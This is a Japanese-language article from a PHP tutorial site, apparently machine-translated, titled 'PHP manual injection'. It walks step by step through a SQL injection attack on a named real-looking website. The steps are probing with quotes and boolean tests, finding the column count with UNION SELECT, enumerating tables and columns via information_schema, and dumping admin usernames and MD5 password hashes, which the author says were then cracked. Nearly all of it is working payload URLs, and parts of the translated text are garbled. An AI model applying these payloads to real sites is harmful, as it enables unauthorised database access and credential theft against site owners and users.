简体中文(ZH-CN)English(EN)繁体中文(ZH-TW)日本語(JA)한국어(KO)Melayu(MS)Français(FR)Deutsch(DE)
ホームページ
記事
に質問
コース
特集
ダウンロード
ゲーム
辞書
最近の更新

ホームページ  >  記事  >  バックエンド開発  >  PHP手動インジェクション

PHP手動インジェクション

WBOY
WBOYオリジナル
2016-06-23 14:31:311201ブラウズ

http://www.rfidcina.org/products/product.php?id=9740

URL の後に ' を追加すると、返されるページにはエラー メッセージなどは表示されませんが、ページにはエラーとコンテンツの欠落です。

次に、 and 1=1 と and 1=2 があり、それぞれ通常の情報と '' ページです。 9740 の前にマイナス記号「-」があります。これには意味がありません。 and 1=2 と同じ効果で、エラーが発生します
http://www.rfidcina.org/products/product.php?id=-9740

次に、union select... 最終的に
http:// を取得します。 www.rfidcina.org/products/product.php?id= -9740+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14
こちら2,3,4,5,6,13はすべてページ内にあります

に表示されています スペースと+は同じ効果でスペースが%20になるので+を使うとより見やすくなります。

user() はデータベースに接続するためのユーザー名を取得し、version() はバージョン番号を明らかにし、database() はデータベース名を明らかにします
http://www.rfidcina.org/products/product.php?id=-9740 +union +select+1,user(),version(),database(),5,6,7,8,9,10,11,12,13,14
上記は root@localhost と 5.1 であることが分かりました.24 -rc-log、ビジネス (ライブラリ名)

GROUP_CONCAT() ルックアップ テーブル
http://www.rfidcina.org/trade/trade.php?id=-9740+and+1=2+union+select +1 , 2, group_concat (distinct+table_name),

4,5,6,7,8,11,13,14+from+information_schema.Columns+TABLE_SCHEMA = 0x627573733 696e657373e ?? 0x6275737369657373 はビジネス用の 16 進コードです。しかし何も取得されず、表示ビットさえも表示されません。

代わりに、 or 1=1 または 1=2 を使用してください。
http://www.rfidcina.org/trade/trade.php?id=9740+or+exists(select+*+from+admin)
非常に成功しました 返品されましたまたは 1=1 のときのページに、管理テーブルがあるようです、

それから列名を推測しました、管理は失敗しました、それは「」のときのページでした、ユーザー名をもう一度試しました、それは成功しました
http:// www.rfidcina.org/trade/trade.php?id=9740+or+exists(select+username+from+admin)
情報を見つけるためにオンラインにアクセスして、hex()、unhex() を推測してみましょう。 。そこで私たちは最初のやり方に戻りました。 。 。

http://www.rfidcina.org/trade/trade.php?id=-9740+union+select+1,2,GROUP_CONCAT(DISTINCT+unhex(hex(table_name))),

4,5, 6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_schema=0x62757373696E657373

これで、すべてのテーブルが公開され、一目で管理テーブルが確認できます。 、 そこにそれがある。


http://www.rfidcina.org/trade/trade.php?id=-9740+union+select+1,2,GROUP_CONCAT(DISTINCT+unhex(hex(column_name))),

4,5, 6,7,8,9,10,11,12,13,14+from+information_schema.columns+where+table_name=0x61646D696E

最後に確認したのは、ユーザー名、パスワードです。

??0x61646D696E は管理者の 16 進コードです
​​
http://www.rfidcina.org/trade/trade.php?

id=-9740+union+select+1,

GROUP_CONCAT(DISTINCT+username), GROUP_CONCAT (DISTINCT+passwd),

4,5,6,7,8,9,10,11,12,13,14+from+bussiness.admin

ユーザー名フィールドとパスワードが 2 と 3 の表示に表示されますそれぞれのフィールド。

パスワードは md5 で、http://www.md5.com.cn/ で復号化されました。



声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。
前の記事:PHP と MySQL 入門 (3)次の記事:PHP と MySQL 入門 (3)

関連記事

続きを見る